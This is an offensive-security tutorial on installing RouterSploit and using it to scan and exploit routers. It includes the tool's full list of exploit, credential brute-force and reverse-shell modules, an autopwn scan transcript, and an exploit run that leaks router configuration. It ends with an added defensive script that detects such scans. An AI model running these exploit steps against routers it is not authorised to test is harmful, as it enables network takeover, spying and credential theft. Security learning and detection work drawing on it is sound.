
How To Take Control Of A Router With RouterSploit «Null Bytes :: WonderHowTo



A router is the core of anyone's internet experience, but most people don't spend much time setting up this critical piece of hardware. Old firmware, default passwords, and other configuration issues continue to haunt many organizations. Exploiting the poor, neglected computer inside these routers has become so popular and easy that automated tools have been created to make the process a breeze.

In this hacking tutorial, we'll learn how to use RouterSploit, a tool for automating the process of router exploitation. But before we dive right in, let's get some background information on the tools available and why router exploitation is so big.

The Basics Behind Router Exploitation

Router exploitation works by breaching a router's Wi-Fi security, bypassing the administrative login page, and accessing administrative features. A skilled attacker can then target the existing firmware that runs the router in a practice called "rootkitting," in which custom firmware is dropped into the router to enable advanced malicious functionality.

Depending on an attacker's goals and resources, this can include spying on the user and any connected devices, injecting malware into the browser to exploit connected devices, enabling advanced spear-phishing attacks, and routing illegal traffic for criminal activities through exploited routers.

Hacking with Cherry Blossom

Government agencies like the NSA and CIA hoard exploits for routers, and the ShadowBrokers have threatened to release these exploits on the heels of the Windows SMB leaks that brought forth WanaCry (or WannaCry). If they follow through on the threats to leak router exploits in June, tools like Cherry Blossom could become widespread.

These tools from the NSA and CIA control entire networks of infected routers and turn them into advanced, on-site wireless espionage devices. Why build a fancy espionage device when you can turn a home router into one?

Cherry Blossom is a rootkitting master framework in which routers are automatically exploited and turned into "Flytraps." A Flytrap is a router that has been compromised and updated with special firmware that prevents the user from updating or modifying the new firmware.

Cherry Blossom can control many "Flytraps," providing instant access to advanced spy devices located in the home or workplace of a target. Image via Cherry Blossom Quick Start Guide / WikiLeaks / CIA

The Flytrap establishes a "beacon" to a command-and-control server called "Cherryweb" and is then assigned "missions" by an operator via an encrypted VPN tunnel. Advanced modules, such as "Windex," which performs a drive-by malware injection attack against any connected target, can turn a Flytrap into an advanced remote espionage platform that can be controlled from anywhere.

Cherry Blossom displays mission commands sent to Flytrap devices, including shell code, recon scripts, and exploits. Some poor guy will get his cherry blossom. Image of Cherry Blossom Quick Start Guide / WikiLeaks / CIA

Criminal IoT & Router Hacking

Apart from the espionage application that the CIA focuses on, routers and IoT devices are commonly targeted because of their routing ability. RouterSploit, the tool we're working with today, doesn't just compromise routers; it can also go after webcams and other connected devices.

While the CIA uses VPN connections to hide traffic to and from command-and-control servers, cybercriminals will use these devices to proxy malicious traffic to avoid detection. In fact, networks of these infected routers and IoT devices are sold as black market proxies to hide illegal activities such as credit card theft, darknet transactions, and DDoS attacks. If you fail to secure your router, you could be signing up to relay traffic for criminal hackers.

Most people set up routers and forget about them, failing to change default settings, update the firmware, or protect them in any other way. Image by nito500 / 123RF

Beginner router hacking

Simply trying the default password is the first step in router exploitation, but there are also more advanced frameworks available, even for beginners. Why would a beginner want to exploit a router? At the local level, if you fully compromise the router, you have complete access to the network. This lets you control and route the target's internet experience to wherever or whatever you want, or forward ports for remote access.

You should consider a router an early and productive target during the stages of an engagement. Even if you are a beginner, the autopwn scanner in RouterSploit will automatically test a number of vulnerabilities against a target IP address, reducing the process of finding a potential exploit to a few seconds.

What Is RouterSploit?

RouterSploit is a handy Python program that automates most tasks related to compromising a router. It is modeled after Metasploit, so its commands will be familiar to anyone used to the Metasploit framework. It includes scanning and exploit modules and is available for Kali Linux (and macOS or Mac OS X if you want).

Once connected to a target network, running a scan shows whether a router can be easily exploited through the framework. Today we'll go through the autopwn feature to quickly identify vulnerabilities on routers and connected devices.

The RouterSploit Exploit Framework landing page with autopwn options.

Getting It Running – What You Need

RouterSploit is great because it runs on Kali Linux, our Kali Raspberry Pi, macOS or Mac OS X, Windows, and even on an unrooted Android phone. To start, we need to take care of some dependencies and make sure that Python is installed. Aside from that, compromising a router has never been easier from any device you have on hand.

Step 1: Install Python and Dependencies

To continue, we need to make sure that Python is installed, along with the following packages:

  • Python3 (with pip)
  • requests
  • Paramiko
  • Beautifulsoup4
  • Pysnmp
  • Gnureadline (MacOS / Mac OS X only)

You can install pip with apt-get and then the Python packages with pip:

  apt-get install python3-pip
  python3 -m pip install requests paramiko beautifulsoup4 pysnmp

Step 2: Installing RouterSploit on Mac, Kali & Others

To install on Kali Linux, open a terminal window and enter the following commands:

  git clone https://github.com/threat9/routersploit
  cd routersploit
  python3 -m pip install -r requirements.txt
  python3 rsf.py

For macOS or Mac OS X, the method is similar. In a terminal window, type the following:

  git clone https://github.com/threat9/routersploit
  cd routersploit
  sudo easy_install pip
  sudo pip install -r requirements.txt

Step 3: Run RouterSploit

For our first run, connect your computer to a network with a router that you want to scan. Navigate to the RouterSploit folder and run RouterSploit by entering the following commands.

  cd
  cd routersploit
  sudo python3 ./rsf.py

The RouterSploit framework will open, and you'll find that it's remarkably similar to the Metasploit framework, both in interface style and in workflow.

A command-line interface lets you enter simple commands to scan and exploit routers, and you can see everything RouterSploit has to offer by typing:

  show all

As you can see in the output below, there are lots of exploits, default creds, and scanners! How fun.

  creds/generic/snmp_bruteforce
  creds/generic/telnet_default
  creds/generic/ssh_default
  creds/generic/ftp_bruteforce
  creds/generic/http_basic_digest_bruteforce
  creds/generic/ftp_default
  creds/generic/http_basic_digest_default
  creds/generic/ssh_bruteforce
  creds/generic/telnet_bruteforce
  creds/routers/ipfire/ssh_default_creds
  creds/routers/ipfire/telnet_default_creds
  creds/routers/ipfire/ftp_default_creds
  creds/routers/bhu/ssh_default_creds
  creds/routers/bhu/telnet_default_creds
  creds/routers/bhu/ftp_default_creds
  creds/routers/linksys/ssh_default_creds
  creds/routers/linksys/telnet_default_creds
  creds/routers/linksys/ftp_default_creds
  creds/routers/technicolor/ssh_default_creds
  creds/routers/technicolor/telnet_default_creds
  creds/routers/technicolor/ftp_default_creds
  creds/routers/asus/ssh_default_creds
  creds/routers/asus/telnet_default_creds
  creds/routers/asus/ftp_default_creds
  creds/routers/billion/ssh_default_creds
  creds/routers/billion/telnet_default_creds
  creds/routers/billion/ftp_default_creds
  creds/routers/zte/ssh_default_creds
  creds/routers/zte/telnet_default_creds
  creds/routers/zte/ftp_default_creds
  creds/routers/ubiquiti/ssh_default_creds
  creds/routers/ubiquiti/telnet_default_creds
  creds/routers/ubiquiti/ftp_default_creds
  creds/routers/asmax/ssh_default_creds
  creds/routers/asmax/telnet_default_creds
  creds/routers/asmax/ftp_default_creds
  creds/routers/asmax/webinterface_http_auth_default_creds
  creds/routers/huawei/ssh_default_creds
  creds/routers/huawei/telnet_default_creds
  creds/routers/huawei/ftp_default_creds
  creds/routers/tplink/ssh_default_creds
  creds/routers/tplink/telnet_default_creds
  creds/routers/tplink/ftp_default_creds
  creds/routers/netgear/ssh_default_creds
  creds/routers/netgear/telnet_default_creds
  creds/routers/netgear/ftp_default_creds
  creds/routers/mikrotik/ssh_default_creds
  creds/routers/mikrotik/telnet_default_creds
  creds/routers/mikrotik/ftp_default_creds
  creds/routers/mikrotik/api_ros_default_creds
  creds/routers/movistar/ssh_default_creds
  creds/routers/movistar/telnet_default_creds
  creds/routers/movistar/ftp_default_creds
  creds/routers/dlink/ssh_default_creds
  creds/routers/dlink/telnet_default_creds
  creds/routers/dlink/ftp_default_creds
  creds/routers/juniper/ssh_default_creds
  creds/routers/juniper/telnet_default_creds
  creds/routers/juniper/ftp_default_creds
  creds/routers/comtrend/ssh_default_creds
  creds/routers/comtrend/telnet_default_creds
  creds/routers/comtrend/ftp_default_creds
  creds/routers/fortinet/ssh_default_creds
  creds/routers/fortinet/telnet_default_creds
  creds/routers/fortinet/ftp_default_creds
  creds/routers/belkin/ssh_default_creds
  creds/routers/belkin/telnet_default_creds
  creds/routers/belkin/ftp_default_creds
  creds/routers/netsys/ssh_default_creds
  creds/routers/netsys/telnet_default_creds
  creds/routers/netsys/ftp_default_creds
  creds/routers/pfsense/ssh_default_creds
  creds/routers/pfsense/webinterface_http_form_default_creds
  creds/routers/zyxel/ssh_default_creds
  creds/routers/zyxel/telnet_default_creds
  creds/routers/zyxel/ftp_default_creds
  creds/routers/thomson/ssh_default_creds
  creds/routers/thomson/telnet_default_creds
  creds/routers/thomson/ftp_default_creds
  creds/routers/netcore/ssh_default_creds
  creds/routers/netcore/telnet_default_creds
  creds/routers/netcore/ftp_default_creds
  creds/routers/cisco/ssh_default_creds
  creds/routers/cisco/telnet_default_creds
  creds/routers/cisco/ftp_default_creds
  creds/cameras/grandstream/ssh_default_creds
  creds/cameras/grandstream/telnet_default_creds
  creds/cameras/grandstream/ftp_default_creds
  creds/cameras/basler/ssh_default_creds
  creds/cameras/basler/webinterface_http_form_default_creds
  creds/cameras/basler/telnet_default_creds
  creds/cameras/basler/ftp_default_creds
  creds/cameras/avtech/ssh_default_creds
  creds/cameras/avtech/telnet_default_creds
  creds/cameras/avtech/ftp_default_creds
  creds/cameras/vacron/ssh_default_creds
  creds/cameras/vacron/telnet_default_creds
  creds/cameras/vacron/ftp_default_creds
  creds/cameras/acti/ssh_default_creds
  creds/cameras/acti/webinterface_http_form_default_creds
  creds/cameras/acti/telnet_default_creds
  creds/cameras/acti/ftp_default_creds
  creds/cameras/sentry360/ssh_default_creds
  creds/cameras/sentry360/telnet_default_creds
  creds/cameras/sentry360/ftp_default_creds
  creds/cameras/siemens/ssh_default_creds
  creds/cameras/siemens/telnet_default_creds
  creds/cameras/siemens/ftp_default_creds
  creds/cameras/american_dynamics/ssh_default_creds
  creds/cameras/american_dynamics/telnet_default_creds
  creds/cameras/american_dynamics/ftp_default_creds
  creds/cameras/videoiq/ssh_default_creds
  creds/cameras/videoiq/telnet_default_creds
  creds/cameras/videoiq/ftp_default_creds
  creds/cameras/jvc/ssh_default_creds
  creds/cameras/jvc/telnet_default_creds
  creds/cameras/jvc/ftp_default_creds
  creds/cameras/speco/ssh_default_creds
  creds/cameras/speco/telnet_default_creds
  creds/cameras/speco/ftp_default_creds
  creds/cameras/iqinvision/ssh_default_creds
  creds/cameras/iqinvision/telnet_default_creds
  creds/cameras/iqinvision/ftp_default_creds
  creds/cameras/avigilon/ssh_default_creds
  creds/cameras/avigilon/telnet_default_creds
  creds/cameras/avigilon/ftp_default_creds
  creds/cameras/canon/ssh_default_creds
  creds/cameras/canon/telnet_default_creds
  creds/cameras/canon/ftp_default_creds
  creds/cameras/canon/webinterface_http_auth_default_creds
  creds/cameras/hikvision/ssh_default_creds
  creds/cameras/hikvision/telnet_default_creds
  creds/cameras/hikvision/ftp_default_creds
  creds/cameras/dlink/ssh_default_creds
  creds/cameras/dlink/telnet_default_creds
  creds/cameras/dlink/ftp_default_creds
  creds/cameras/honeywell/ssh_default_creds
  creds/cameras/honeywell/telnet_default_creds
  creds/cameras/honeywell/ftp_default_creds
  creds/cameras/samsung/ssh_default_creds
  creds/cameras/samsung/telnet_default_creds
  creds/cameras/samsung/ftp_default_creds
  creds/cameras/axis/ssh_default_creds
  creds/cameras/axis/telnet_default_creds
  creds/cameras/axis/ftp_default_creds
  creds/cameras/axis/webinterface_http_auth_default_creds
  creds/cameras/arecont/ssh_default_creds
  creds/cameras/arecont/telnet_default_creds
  creds/cameras/arecont/ftp_default_creds
  creds/cameras/brickcom/ssh_default_creds
  creds/cameras/brickcom/telnet_default_creds
  creds/cameras/brickcom/ftp_default_creds
  creds/cameras/brickcom/webinterface_http_auth_default_creds
  creds/cameras/mobotix/ssh_default_creds
  creds/cameras/mobotix/telnet_default_creds
  creds/cameras/mobotix/ftp_default_creds
  creds/cameras/geovision/ssh_default_creds
  creds/cameras/geovision/telnet_default_creds
  creds/cameras/geovision/ftp_default_creds
  creds/cameras/stardot/ssh_default_creds
  creds/cameras/stardot/telnet_default_creds
  creds/cameras/stardot/ftp_default_creds
  creds/cameras/cisco/ssh_default_creds
  creds/cameras/cisco/telnet_default_creds
  creds/cameras/cisco/ftp_default_creds
  payloads/perl/bind_tcp
  payloads/perl/reverse_tcp
  payloads/python/bind_tcp
  payloads/python/reverse_tcp
  payloads/python/bind_udp
  payloads/python/reverse_udp
  payloads/mipsbe/bind_tcp
  payloads/mipsbe/reverse_tcp
  payloads/armle/bind_tcp
  payloads/armle/reverse_tcp
  payloads/x86/bind_tcp
  payloads/x86/reverse_tcp
  payloads/php/bind_tcp
  payloads/php/reverse_tcp
  payloads/cmd/php_reverse_tcp
  payloads/cmd/python_reverse_tcp
  payloads/cmd/python_bind_tcp
  payloads/cmd/perl_reverse_tcp
  payloads/cmd/netcat_reverse_tcp
  payloads/cmd/awk_reverse_tcp
  payloads/cmd/awk_bind_tcp
  payloads/cmd/bash_reverse_tcp
  payloads/cmd/php_bind_tcp
  payloads/cmd/awk_bind_udp
  payloads/cmd/netcat_bind_tcp
  payloads/cmd/perl_bind_tcp
  payloads/cmd/python_reverse_udp
  payloads/cmd/python_bind_udp
  payloads/x64/bind_tcp
  payloads/x64/reverse_tcp
  payloads/mipsle/bind_tcp
  payloads/mipsle/reverse_tcp
  scanners/autopwn
  scanners/misc/misc_scan
  scanners/routers/router_scan
  scanners/cameras/camera_scan
  exploits/generic/shellshock
  exploits/generic/ssh_auth_keys
  exploits/generic/heartbleed
  exploits/misc/asus/b1m_projector_rce
  exploits/misc/wepresent/wipg1000_rce
  exploits/misc/miele/pg8528_path_traversal
  exploits/routers/ipfire/ipfire_oinkcode_rce
  exploits/routers/ipfire/ipfire_proxy_rce
  exploits/routers/ipfire/ipfire_shellshock
  exploits/routers/2wire/gateway_auth_bypass
  exploits/routers/2wire/4011g_5012nv_path_traversal
  exploits/routers/bhu/bhu_urouter_rce
  exploits/routers/linksys/1500_2500_rce
  exploits/routers/linksys/smartwifi_password_disclosure
  exploits/routers/linksys/wrt100_110_rce
  exploits/routers/linksys/wap54gv3_rce
  exploits/routers/technicolor/tg784_authbypass
  exploits/routers/technicolor/tc7200_password_disclosure_v2
  exploits/routers/technicolor/dwg855_authbypass
  exploits/routers/technicolor/tc7200_password_disclosure
  exploits/routers/asus/infosvr_backdoor_rce
  exploits/routers/asus/rt_n16_password_disclosure
  exploits/routers/billion/billion_5200w_rce
  exploits/routers/billion/billion_7700nr4_password_disclosure
  exploits/routers/zte/f460_f660_backdoor
  exploits/routers/zte/zxv10_rce
  exploits/routers/ubiquiti/airos_6_x
  exploits/routers/asmax/ar_1004g_password_disclosure
  exploits/routers/asmax/ar_804_gu_rce
  exploits/routers/huawei/hg520_info_dislosure
  exploits/routers/huawei/hg866_password_change
  exploits/routers/huawei/hg530_hg520b_password_disclosure
  exploits/routers/huawei/e5331_mifi_info_disclosure
  exploits/routers/tplink/wdr740nd_wdr740n_backdoor
  exploits/routers/tplink/archer_c2_c20i_rce
  exploits/routers/tplink/wdr740nd_wdr740n_path_traversal
  exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure
  exploits/routers/netgear/jnr1010_path_traversal
  exploits/routers/netgear/n300_auth_bypass
  exploits/routers/netgear/multi_password_disclosure-2017-5521
  exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
  exploits/routers/netgear/prosafe_rce
  exploits/routers/netgear/r7000_r6400_rce
  exploits/routers/netgear/multi_rce
  exploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversal
  exploits/routers/netgear/dgn2200_ping_cgi_rce
  exploits/routers/mikrotik/routeros_jailbreak
  exploits/routers/movistar/adsl_router_bhs_rta_path_traversal
  exploits/routers/dlink/dsp_w110_rce
  exploits/routers/dlink/dgs_1510_add_user
  exploits/routers/dlink/dir_645_815_rce
  exploits/routers/dlink/dir_815_850l_rce
  exploits/routers/dlink/dir_300_320_615_auth_bypass
  exploits/routers/dlink/dir_645_password_disclosure
  exploits/routers/dlink/dir_850l_creds_disclosure
  exploits/routers/dlink/dvg_n5402sp_path_traversal
  exploits/routers/dlink/dsl_2640b_dns_change
  exploits/routers/dlink/dcs_930l_auth_rce
  exploits/routers/dlink/dir_825_path_traversal
  exploits/routers/dlink/multi_hedwig_cgi_exec
  exploits/routers/dlink/dns_320l_327l_rce
  exploits/routers/dlink/dsl_2730_2750_path_traversal
  exploits/routers/dlink/dsl_2750b_info_disclosure
  exploits/routers/dlink/dir_300_600_rce
  exploits/routers/dlink/dwl_3200ap_password_disclosure
  exploits/routers/dlink/dsl_2740r_dns_change
  exploits/routers/dlink/dir_8xx_password_disclosure
  exploits/routers/dlink/dwr_932b_backdoor
  exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
  exploits/routers/dlink/dwr_932_info_disclosure
  exploits/routers/dlink/dir_300_320_600_615_info_disclosure
  exploits/routers/dlink/dsl_2750b_rce
  exploits/routers/dlink/multi_hnap_rce
  exploits/routers/dlink/dir_300_645_815_upnp_rce
  exploits/routers/3com/ap8760_password_disclosure
  exploits/routers/3com/imc_path_traversal
  exploits/routers/3com/officeconnect_rce
  exploits/routers/3com/officeconnect_info_disclosure
  exploits/routers/3com/imc_info_disclosure
  exploits/routers/comtrend/ct_5361t_password_disclosure
  exploits/routers/fortinet/fortigate_os_backdoor
  exploits/routers/multi/rom0
  exploits/routers/multi/tcp_32764_rce
  exploits/routers/multi/misfortune_cookie
  exploits/routers/multi/tcp_32764_info_disclosure
  exploits/routers/multi/gpon_home_gateway_rce
  exploits/routers/belkin/g_plus_info_disclosure
  exploits/routers/belkin/play_max_prce
  exploits/routers/belkin/n150_path_traversal
  exploits/routers/belkin/n750_rce
  exploits/routers/belkin/g_n150_password_disclosure
  exploits/routers/belkin/auth_bypass
  exploits/routers/netsys/multi_rce
  exploits/routers/shuttle/915wm_dns_change
  exploits/routers/zyxel/d1000_rce
  exploits/routers/zyxel/p660hn_t_v2_rce
  exploits/routers/zyxel/d1000_wifi_password_disclosure
  exploits/routers/zyxel/zywall_usg_extract_hashes
  exploits/routers/zyxel/p660hn_t_v1_rce
  exploits/routers/thomson/twg850_password_disclosure
  exploits/routers/thomson/twg849_info_disclosure
  exploits/routers/netcore/udp_53413_rce
  exploits/routers/cisco/secure_acs_bypass
  exploits/routers/cisco/catalyst_2960_rocem
  exploits/routers/cisco/ucs_manager_rce
  exploits/routers/cisco/unified_multi_path_traversal
  exploits/routers/cisco/firepower_management60_path_traversal
  exploits/routers/cisco/firepower_management60_rce
  exploits/routers/cisco/video_surv_path_traversal
  exploits/routers/cisco/dpc2420_info_disclosure
  exploits/routers/cisco/ios_http_authorization_bypass
  exploits/routers/cisco/ucm_info_disclosure
  exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli
  exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor
  exploits/cameras/mvpower/dvr_jaws_rce
  exploits/cameras/siemens/cvms2025_credentials_disclosure
  exploits/cameras/avigilon/videoiq_camera_path_traversal
  exploits/cameras/xiongmai/uc_httpd_path_traversal
  exploits/cameras/dlink/dcs_930l_932l_auth_bypass
  exploits/cameras/honeywell/hicc_1100pt_password_disclosure
  exploits/cameras/brickcom/corp_network_cameras_conf_disclosure
  exploits/cameras/brickcom/users_cgi_creds_disclosure
  exploits/cameras/multi/P2P_wificam_credential_disclosure
  exploits/cameras/multi/dvr_creds_disclosure
  exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal
  exploits/cameras/multi/netwave_ip_camera_information_disclosure
  exploits/cameras/multi/P2P_wificam_rce
  generic/bluetooth/btle_enumerate
  generic/bluetooth/btle_scan
  generic/bluetooth/btle_write
  generic/upnp/ssdp_msearch
  rsf >

To begin, we'll start with a scan against a target router, which checks whether each vulnerability might work against it. At the end of the scan, it returns a list of every exploit that works against the target, no research required.

Step 4: Scan a Target

We will use the autopwn scanner to find any vulnerabilities that apply to our target. Find the IP address of the router and save it, as we will need to enter it soon. Most of the time the router is at 192.168.0.1, but that can change. You can use Fing or ARP-scan to find the IP address if you do not know it.

After starting RouterSploit, enter the autopwn module by entering the following commands.

  use scanners/autopwn
  show options

This is very similar to Metasploit. To get around, type use followed by the module you want, show options to display the variables of the selected module, set to set any of the variables you see in show options, and finally run to execute the module. Pretty simple. To close the module and return to the main screen, type exit.

  rsf > use scanners/autopwn
  rsf (AutoPwn) > show options

  Target options:

     Name       Current settings     Description
     ----       ----------------     -----------
     target                          Target IPv4 or IPv6 address

  Module options:

     Name            Current settings     Description
     ----            ----------------     -----------
     http_port       80                   Target Web Interface Port
     http_ssl        false                HTTPS enabled: true/false
     ftp_port        21                   Target FTP port (default: 21)
     ftp_ssl         false                FTPS enabled: true/false
     ssh_port        22                   Target SSH port (default: 22)
     telnet_port     23                   Target Telnet port (default: 23)
     threads         8

In this case, we will set the target to the IP address of the router. Type set target followed by the IP address of the router, then press Enter. Finally, type run to begin the scan.

  rsf (AutoPwn) > set target 10.11.0.4
  [+] {'target': '10.11.0.4'}
  rsf (AutoPwn) > run

Step 5: Select and configure the exploit

After the scan is complete, a list of vulnerabilities found will be displayed. We can choose from this list which exploit is best for our needs. Here we see a router with many vulnerabilities.

  [*] Elapsed time: 9.301568031 seconds

  [*] Could not verify exploitability:
   - exploits/routers/billion/5200w_rce
   - exploits/routers/cisco/catalyst_2960_rocem
   - exploits/routers/cisco/secure_acs_bypass
   - exploits/routers/dlink/dir_815_850l_rce
   - exploits/routers/dlink/dsl_2640b_dns_change
   - exploits/routers/dlink/dsl_2730b_2780b_526_dns_change
   - exploits/routers/dlink/dsl_2740r_dns_change
   - exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
   - exploits/routers/shuttle/915wm_dns_change

  [*] Device is vulnerable:
   - exploits/routers/3com/3cradsl72_info_disclosure
   - exploits/routers/3com/officeconnect_rce
   - exploits/routers/dlink/dcs_930l_auth_rce
   - exploits/routers/dlink/dir_300_600_rce
   - exploits/routers/ipfire/ipfire_proxy_rce
   - exploits/routers/linksys/1500_2500_rce
   - exploits/routers/netgear/prosafe_rce
   - exploits/routers/zyxel/zywall_usg_extract_hashes
   - exploits/routers/dlink/dcs_930l_932l_authbypass

  rsf (AutoPwn) >

Let's start with a simple exploit against one of these vulnerable routers, one that discloses some information. To use this exploit, we'll issue the following commands:

  use exploits/routers/3com/3cradsl72_info_disclosure
  show options

A list of variables is displayed, and you can set your target by typing:

  set target <target router IP>
  check

This will set the target and confirm that it is vulnerable.

  rsf (AutoPwn) > use exploits/routers/3com/3cradsl72_info_disclosure
  show options
  rsf (3Com 3CRADSL72 Info Disclosure) > show options

  Target options:

     Name       Current settings     Description
     ----       ----------------     -----------
     target                          Target IPv4 or IPv6 address

  rsf (3Com 3CRADSL72 Info Disclosure) > set target 10.11.0.4
  [+] {'target': '10.11.0.4'}
  rsf (3Com 3CRADSL72 Info Disclosure) > check
  /Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package ... reRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings InsecureRequestWarning)
  [+] Target is vulnerable
  rsf (3Com 3CRADSL72 Info Disclosure) >

Step 6: Run the Exploit

The target looks good and vulnerable. To fire the payload, type run.

  rsf (3Com 3CRADSL72 Info Disclosure) > run
  [*] Running module...
  [*] Sending request to download sensitive information
  /Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package ... reRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings InsecureRequestWarning)
  [+] Exploit success
  [*] Reading /app_sta.stm file

If the exploit is successful, you should be greeted with internal configuration settings that can leak the login and password of users, default passwords, and the device serial number, among other settings that allow you to compromise the router. Other modules let you remotely inject code or directly disclose the router's password. Which ones you can run depends on what the target router is vulnerable to.

Warnings

This intro should get you familiar with using RouterSploit to compromise a router; now you can start using other modules and experimenting with different kinds of exploits. Although autopwn is a convenient feature, it tries many different exploits and is therefore very noisy on the network. The preferred option is to scan your target, do some recon, and run only the modules relevant to the manufacturer of the target router. While exploiting routers may be trendy, keep in mind that doing it to someone else's router without permission is a crime. Unless you're the CIA.
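
Because autopwn tries many exploits in a few seconds, it leaves a distinctive burst in router-side logs. The following Python example is added here and is not part of the original article or of RouterSploit: it flags a source that touches several of the management ports listed in the autopwn options and requests many distinct web paths within a short window. The log format, the thresholds, and the sample lines are constructed assumptions.

```python
"""Flag autopwn-style bursts in a router-side connection log (added example)."""
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Optional

# Service ports taken from the autopwn module options shown in the article.
MGMT_PORTS = {21, 22, 23, 80}
# Assumed thresholds; tune them against your own baseline traffic.
WINDOW_SECONDS = 15.0   # a little longer than the ~9.3 s scan in the article
MIN_PORTS = 3           # distinct management ports touched inside one window
MIN_HTTP_PATHS = 10     # distinct web paths requested inside one window


@dataclass(frozen=True)
class Event:
    ts: float
    src: str
    dst: str
    dport: int
    path: Optional[str]


def parse_line(line):
    """Parse 'epoch src dst dport path' (constructed format); None if malformed."""
    parts = line.split()
    if len(parts) != 5:
        return None
    try:
        ts, dport = float(parts[0]), int(parts[3])
    except ValueError:
        return None
    path = None if parts[4] == "-" else parts[4]
    return Event(ts, parts[1], parts[2], dport, path)


def detect_bursts(events):
    """Return {(src, dst): (first_alert_ts, ports, n_paths)} for noisy pairs."""
    windows = defaultdict(deque)
    alerts = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.dport not in MGMT_PORTS:
            continue
        key = (ev.src, ev.dst)
        win = windows[key]
        win.append(ev)
        # Drop events that fell out of the sliding window.
        while ev.ts - win[0].ts > WINDOW_SECONDS:
            win.popleft()
        ports = {e.dport for e in win}
        paths = {e.path for e in win if e.path}
        if len(ports) >= MIN_PORTS and len(paths) >= MIN_HTTP_PATHS:
            # Keep only the first time the pair crossed both thresholds.
            alerts.setdefault(key, (ev.ts, sorted(ports), len(paths)))
    return alerts


def constructed_log():
    """Constructed sample lines; none of this is captured traffic."""
    t0 = 1700000000.0
    lines = []
    # Scanner-like source: 12 distinct web paths plus FTP/SSH/Telnet in ~8 s.
    for i in range(12):
        lines.append(f"{t0 + i * 0.7:.3f} 10.11.0.23 10.11.0.4 80 /constructed-path-{i:02d}")
    for i, port in enumerate((21, 22, 23)):
        lines.append(f"{t0 + 1 + i:.3f} 10.11.0.23 10.11.0.4 {port} -")
    # Admin workstation: a few pages over several minutes, one SSH login.
    for i, path in enumerate(("/", "/status", "/wireless", "/")):
        lines.append(f"{t0 + i * 90:.3f} 10.11.0.50 10.11.0.4 80 {path}")
    lines.append(f"{t0 + 400:.3f} 10.11.0.50 10.11.0.4 22 -")
    lines.append("garbage line that the parser must skip")
    return lines


def run_demo():
    events = [e for e in map(parse_line, constructed_log()) if e is not None]
    return detect_bursts(events)


if __name__ == "__main__":
    for (src, dst), (ts, ports, n_paths) in run_demo().items():
        print(f"ALERT {src} -> {dst} at {ts:.1f}: ports={ports} distinct_paths={n_paths}")
```

Requiring both thresholds keeps an administrator's normal browsing and a single-port monitoring probe from raising alerts, while the same probes spread over minutes fall outside the window.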

Don't miss: How to Exploit Routers on an Unrooted Android Phone

You can ask me questions here or @sadmin2001 on Twitter or Instagram.

Cover image and screenshots by SADMIN / Null Byte



